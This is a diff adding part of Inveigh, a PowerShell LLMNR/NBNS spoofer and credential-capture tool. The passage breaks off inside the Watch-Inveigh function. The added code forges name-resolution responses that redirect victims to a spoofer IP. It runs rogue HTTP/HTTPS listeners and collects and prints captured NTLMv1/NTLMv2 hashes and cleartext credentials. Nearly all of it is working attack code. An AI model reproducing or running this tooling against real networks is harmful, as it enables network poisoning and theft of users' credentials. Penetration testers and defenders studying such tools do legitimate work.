+                                        $NBNS_response_message = "- $source_IP is not on reply list"
+                                    }
+                                    elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+                                    {
+                                        $NBNS_response_message = "- $source_IP is on ignore list"
+                                    }
+                                    elseif($NBNS_query_string.Trim() -eq '*')
+                                    {
+                                        $NBNS_response_message = "- NBSTAT request"
+                                    }
+                                    elseif($inveigh.valid_host_list -contains $NBNS_query_string)
+                                    {
+                                        $NBNS_response_message = "- $NBNS_query_string is a valid host"
+                                    }
+                                    elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
+                                    {
+                                        $NBNS_response_message = "- previous capture from $source_IP"
+                                    }
+                                    elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
+                                    {
+                                        $NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
+                                    }
+                                    elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+                                    {
+                                        $NBNS_response_message = "- request is local"
+                                    }
+                                    else
+                                    {
+                                        $NBNS_response_message = "- something went wrong"
+                                    }
+
+                                }
+
+                            }
+
+                            if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
+                            {
+                                $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+                                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
+                            }
+                            elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+                            {
+                                [Byte[]]$NBNS_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)]
+                                $NBNS_response_IP = [System.Net.IPAddress]$NBNS_response_IP_bytes
+                                $NBNS_response_IP = $NBNS_response_IP.IPAddressToString
+
+                                if($inveigh.valid_host_list -notcontains $NBNS_query_string)
+                                {
+                                    $inveigh.valid_host_list.Add($NBNS_query_string)
+                                    $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
+                                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")])
+                                }
+                            }
+                        }
+                    }
+
+                    5355 # LLMNR
+                    {
+
+                        if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length - 3)]) -ne '00-1c') # ignore AAAA for now
+                        {
+                            $UDP_length[0] += $payload_bytes.Length - 2
+                            $LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length]
+
+                            $LLMNR_response_data += $LLMNR_response_data +
+                                                    $LLMNR_TTL_bytes +
+                                                    0x00,0x04 +
+                                                    ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+            
+                            $LLMNR_response_packet = 0x14,0xeb +
+                                                        $source_port[1,0] +
+                                                        $UDP_length[1,0] +
+                                                        0x00,0x00 +
+                                                        $payload_bytes[0,1] +
+                                                        0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
+                                                        $LLMNR_response_data
+                
+                            $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])
+                            $LLMNR_query = $LLMNR_query -replace "-00",""
+
+                            if($LLMNR_query.Length -eq 2)
+                            {
+                                $LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16)
+                                $LLMNR_query_string = New-Object System.String($LLMNR_query)
+                            }
+                            else
+                            {
+                                $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                                $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)
+                            }
+
+                            $LLMNR_request_ignore = $false
+                
+                            if($LLMNR -eq 'Y')
+                            {
+
+                                if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $LLMNR_query_string -and $source_IP -ne $IP)
+                                {
+
+                                    if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"})))
+                                    {
+                                        $LLMNR_learning_queue_time = [DateTime]$LLMNR_learning_log.Find({param($s) $s -like "20* $LLMNR_query_string"}).SubString(0,19)
+
+                                        if((Get-Date) -ge $LLMNR_learning_queue_time.AddMinutes($SpooferLearningInterval))
+                                        {
+                                            $LLMNR_learning_log.RemoveAt($LLMNR_learning_log.FindIndex({param($s) $s -like "20* $LLMNR_query_string"}))
+                                            $LLMNR_learning_send = $true
+                                        }
+                                        else
+                                        {
+                                            $LLMNR_learning_send = $false
+                                        }
+
+                                    }
+                                    else
+                                    {           
+                                        $LLMNR_learning_send = $true
+                                    }
+
+                                    if($LLMNR_learning_send)
+                                    {
+                                        $LLMNR_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+                                        $LLMNR_transaction_ID_bytes = $LLMNR_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                                        $LLMNR_transaction_ID = $LLMNR_transaction_ID -replace " ","-"
+                                        $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient
+                                        $LLMNR_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)]
+
+                                        $LLMNR_request_packet = $LLMNR_transaction_ID_bytes +
+                                                                0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00 +
+                                                                ($LLMNR_hostname_bytes.Length - 1) +
+                                                                $LLMNR_hostname_bytes +
+                                                                0x00,0x01,0x00,0x01
+
+                                        $LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355)
+                                        $LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint)
+                                        $LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length)
+                                        $LLMNR_UDP_client_port = ($LLMNR_UDP_client.Client.LocalEndPoint).Port
+                                        $LLMNR_UDP_client.Close()
+                                        $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string")
+                                        $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
+                                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")])
+                                    }
+
+                                }
+
+                                if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
+                                !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
+                                !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and (
+                                $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)))
+                                {
+
+                                    if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+                                    {
+                                        $LLMNR_send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
+                                        $LLMNR_send_socket.SendBufferSize = 1024
+                                        $LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) 
+                                        $LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
+                                        $LLMNR_send_socket.Close()
+                                        $LLMNR_response_message = "- response sent"
+                                    }
+                                    else
+                                    {
+                                        $LLMNR_request_ignore = $true
+                                    }
+                                }
+                                else
+                                {
+
+                                    if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
+                                    {
+                                        $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
+                                    }
+                                    elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
+                                    {
+                                        $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
+                                    }
+                                    elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+                                    {
+                                        $LLMNR_response_message = "- $source_IP is not on reply list"
+                                    }
+                                    elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+                                    {
+                                        $LLMNR_response_message = "- $source_IP is on ignore list"
+                                    }
+                                    elseif($inveigh.valid_host_list -contains $LLMNR_query_string)
+                                    {
+                                        $LLMNR_response_message = "- $LLMNR_query_string is a valid host"
+                                    }
+                                    elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
+                                    {
+                                        $LLMNR_response_message = "- previous capture from $source_IP"
+                                    }
+                                    elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
+                                    {
+                                        $LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
+                                    }
+                                    else
+                                    {
+                                        $LLMNR_response_message = "- something went wrong"
+                                    }
+                                
+                                }
+                            
+                            }
+
+                            if(!$LLMNR_request_ignore)
+                            {
+                                $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+                                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+                            }
+
+                        }
+                    }
+
+                }
+
+                switch($endpoint_source_port)
+                {
+
+                    5355 # LLMNR Response
+                    {
+                    
+                        if($SpooferLearning -eq 'Y' -and $LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+                        {
+                            $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes[12] + 13)])
+                            $LLMNR_query = $LLMNR_query -replace "-00",""
+
+                            if($LLMNR_query.Length -eq 2)
+                            {
+                                $LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16)
+                                $LLMNR_query_string = New-Object System.String($LLMNR_query)
+                            }
+                            else
+                            {
+                                $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                                $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)
+                            }
+                            
+                            [Byte[]]$LLMNR_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)]
+                            $LLMNR_response_IP = [System.Net.IPAddress]$LLMNR_response_IP_bytes
+                            $LLMNR_response_IP = $LLMNR_response_IP.IPAddressToString
+                            
+                            if($inveigh.valid_host_list -notcontains $LLMNR_query_string)
+                            {
+                                $inveigh.valid_host_list.Add($LLMNR_query_string)
+                                $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
+                                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")])
+                            }
+                            
+                        }
+
+                    }
+
+                }
+
+            }
+
+        }
+
+        if($RunTime)
+        {
+         
+            if($sniffer_stopwatch.Elapsed -ge $sniffer_timeout)
+            {
+
+                if($inveigh.HTTP_listener.IsListening)
+                {
+                    $inveigh.HTTP_listener.Stop()
+                    $inveigh.HTTP_listener.Close()
+                }
+
+                $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")])
+                Start-Sleep -m 5
+                $inveigh.running = $false
+    
+                if($inveigh.HTTPS)
+                {
+                    & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+        
+                    try
+                    {
+                        $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+                        $certificate_store.Open('ReadWrite')
+                        $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
+                        $certificate_store.Remove($certificate)
+                        $certificate_store.Close()
+                    }
+                    catch
+                    {
+
+                        if($inveigh.status_output)
+                        {
+                            $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
+                        }
+
+                        $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+
+                        if($inveigh.file_output)
+                        {
+                            "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append   
+                        }
+                    
+                    }
+
+                }
+                
+                $inveigh.HTTP = $false
+                $inveigh.HTTPS = $false     
+            }
+        }
+
+        if($inveigh.file_output)
+        {
+            while($inveigh.log_file_queue.Count -gt 0)
+            {
+                $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
+                $inveigh.log_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.NTLMv1_file_queue.Count -gt 0)
+            {
+                $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
+                $inveigh.NTLMv1_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.NTLMv2_file_queue.Count -gt 0)
+            {
+                $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
+                $inveigh.NTLMv2_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.cleartext_file_queue.Count -gt 0)
+            {
+                $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+                $inveigh.cleartext_file_queue.RemoveAt(0)
+            }
+
+        }
+
+    }
+
+    $binary_reader.Close()
+    $memory_stream.Dispose()
+    $memory_stream.Close()
+}
+
+# End ScriptBlocks
+# Begin Startup Functions
+
+# HTTP/HTTPS Listener Startup Function 
+function HTTPListener()
+{
+    $inveigh.HTTP_listener = New-Object System.Net.HttpListener
+
+    if($inveigh.HTTP)
+    {
+        $inveigh.HTTP_listener.Prefixes.Add('http://*:80/')
+    }
+
+    if($inveigh.HTTPS)
+    {
+        $inveigh.HTTP_listener.Prefixes.Add('https://*:443/')
+    }
+
+    $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" 
+    $inveigh.HTTP_listener.Start()
+    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
+    $HTTP_runspace.Open()
+    $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $HTTP_powershell = [PowerShell]::Create()
+    $HTTP_powershell.Runspace = $HTTP_runspace
+    $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
+        $HTTPBasicRealm).AddArgument($HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument(
+        $HTTPDir).AddArgument($HTTPResponse).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+    $HTTP_powershell.BeginInvoke() > $null
+}
+
+# Sniffer/Spoofer Startup Function
+function SnifferSpoofer()
+{
+    $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
+    $sniffer_runspace.Open()
+    $sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $sniffer_powershell = [PowerShell]::Create()
+    $sniffer_powershell.Runspace = $sniffer_runspace
+    $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
+    $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument(
+        $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(
+        $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(
+        $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
+        $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument(
+        $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null
+    $sniffer_powershell.BeginInvoke() > $null
+}
+
+# End Startup Functions
+
+# Startup Enabled Services
+
+# HTTP Server Start
+if($inveigh.HTTP -or $inveigh.HTTPS)
+{
+    HTTPListener
+}
+
+# Sniffer/Spoofer Start - always enabled
+SnifferSpoofer
+
+if($inveigh.console_output)
+{
+
+    if($ConsoleStatus)
+    {    
+        $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+        $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+    }
+
+    :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+    {
+
+        while($inveigh.console_queue.Count -gt 0)
+        {
+
+            if($inveigh.output_stream_only)
+            {
+                Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+                $inveigh.console_queue.RemoveAt(0)
+            }
+            else
+            {
+
+                switch -wildcard ($inveigh.console_queue[0])
+                {
+
+                    "* written to *"
+                    {
+
+                        if($inveigh.file_output)
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                        }
+
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "* for relay *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "*SMB relay *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "* local administrator *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    default
+                    {
+                        Write-Output $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                } 
+
+            }
+
+        }
+
+        if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
+        {
+            
+            if($inveigh.cleartext_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+                $inveigh.cleartext_list.Sort()
+
+                foreach($unique_cleartext in $inveigh.cleartext_list)
+                {
+                    if($unique_cleartext -ne $unique_cleartext_last)
+                    {
+                        Write-Output($unique_cleartext + $inveigh.newline)
+                    }
+
+                    $unique_cleartext_last = $unique_cleartext
+                }
+
+                Start-Sleep -m 5
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
+            }
+            
+            if($inveigh.NTLMv1_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+                $inveigh.NTLMv1_list.Sort()
+
+                foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+                {
+                    $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+                    if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+                    {
+                        Write-Output($unique_NTLMv1 + $inveigh.newline)
+                    }
+
+                    $unique_NTLMv1_account_last = $unique_NTLMv1_account
+                }
+
+                $unique_NTLMv1_account_last = ''
+                Start-Sleep -m 5
+                Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+
+                foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+                {
+                    Write-Output($NTLMv1_username + $inveigh.newline)
+                }
+
+                Start-Sleep -m 5
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+            }
+
+            if($inveigh.NTLMv2_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+                $inveigh.NTLMv2_list.Sort()
+
+                foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+                {
+                    $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+                    if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+                    {
+                        Write-Output($unique_NTLMv2 + $inveigh.newline)
+                    }
+
+                    $unique_NTLMv2_account_last = $unique_NTLMv2_account
+                }
+
+                $unique_NTLMv2_account_last = ''
+                Start-Sleep -m 5
+                Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+
+                foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+                {
+                    Write-Output($NTLMv2_username + $inveigh.newline)
+                }
+                
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+            }
+
+            $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+        }
+
+        if($inveigh.console_input)
+        {
+
+            if([Console]::KeyAvailable)
+            {
+                $inveigh.console_output = $false
+                BREAK console_loop
+            }
+        
+        }
+
+        Start-Sleep -m 5
+    }
+
+}
+
+}
+#End Invoke-Inveigh
+
+function Stop-Inveigh
+{
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+if($inveigh)
+{
+
+    if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+    {
+
+        if($inveigh.HTTP_listener.IsListening)
+        {
+            $inveigh.HTTP_listener.Stop()
+            $inveigh.HTTP_listener.Close()
+        }
+            
+        if($inveigh.unprivileged_running)
+        {
+            $inveigh.unprivileged_running = $false
+            Start-Sleep -s 5
+            Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        }
+            
+        if($inveigh.relay_running)
+        {
+            $inveigh.relay_running = $false
+            Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        } 
+
+        if($inveigh.running)
+        {
+            $inveigh.running = $false
+            Write-Output("Inveigh exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        } 
+
+    }
+    else
+    {
+        Write-Output("There are no running Inveigh functions")
+    }
+    
+    if($inveigh.HTTPS)
+    {
+        & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+
+        try
+        {
+            $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+            $certificate_store.Open('ReadWrite')
+            $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
+            $certificate_store.Remove($certificate)
+            $certificate_store.Close()
+        }
+        catch
+        {
+            Write-Output("SSL Certificate Deletion Error - Remove Manually")
+            $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append   
+            }
+
+        }
+    }
+
+    $inveigh.HTTP = $false
+    $inveigh.HTTPS = $false
+}
+else
+{
+    Write-Output("There are no running Inveigh functions")|Out-Null
+}
+
+} 
+
+function Get-Inveigh
+{
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set. 
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+#>
+
+[CmdletBinding()]
+param
+( 
+    [parameter(Mandatory=$false)][Switch]$Console,
+    [parameter(Mandatory=$false)][Switch]$Log,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+    [parameter(Mandatory=$false)][Switch]$Cleartext,
+    [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+    [parameter(Mandatory=$false)][Switch]$Learning,
+    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($Console -or $PSBoundParameters.Count -eq 0)
+{
+
+    while($inveigh.console_queue.Count -gt 0)
+    {
+
+        if($inveigh.output_stream_only)
+        {
+            Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+            $inveigh.console_queue.RemoveAt(0)
+        }
+        else
+        {
+
+            switch -wildcard ($inveigh.console_queue[0])
+            {
+
+                "* written to *"
+                {
+
+                    if($inveigh.file_output)
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                    }
+
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "* for relay *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "*SMB relay *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "* local administrator *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                default
+                {
+                    Write-Output $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+            }
+
+        }
+         
+    }
+
+}
+
+if($Log)
+{
+    Write-Output $inveigh.log
+}
+
+if($NTLMv1)
+{
+    Write-Output $inveigh.NTLMv1_list
+}
+
+if($NTLMv1Unique)
+{
+    $inveigh.NTLMv1_list.Sort()
+
+    foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+    {
+        $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+        if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+        {
+            Write-Output $unique_NTLMv1
+        }
+
+        $unique_NTLMv1_account_last = $unique_NTLMv1_account
+    }
+
+}
+
+if($NTLMv1Usernames)
+{
+    Write-Output $inveigh.NTLMv2_username_list
+}
+
+if($NTLMv2)
+{
+    Write-Output $inveigh.NTLMv2_list
+}
+
+if($NTLMv2Unique)
+{
+    $inveigh.NTLMv2_list.Sort()
+
+    foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+    {
+        $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+        if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+        {
+            Write-Output $unique_NTLMv2
+        }
+
+        $unique_NTLMv2_account_last = $unique_NTLMv2_account
+    }
+
+}
+
+if($NTLMv2Usernames)
+{
+    Write-Output $inveigh.NTLMv2_username_list
+}
+
+if($Cleartext)
+{
+    Write-Output $inveigh.cleartext_list
+}
+
+if($CleartextUnique)
+{
+    Write-Output $inveigh.cleartext_list | Get-Unique
+}
+
+if($Learning)
+{
+    Write-Output $inveigh.valid_host_list
+}
+
+}
+
+function Watch-Inveigh
+{
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+#>
+
+if($inveigh.tool -ne 1)
+{
+
+    if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+    {
+        Write-Output "Press any key to stop real time console output"
+        $inveigh.console_output = $true
+
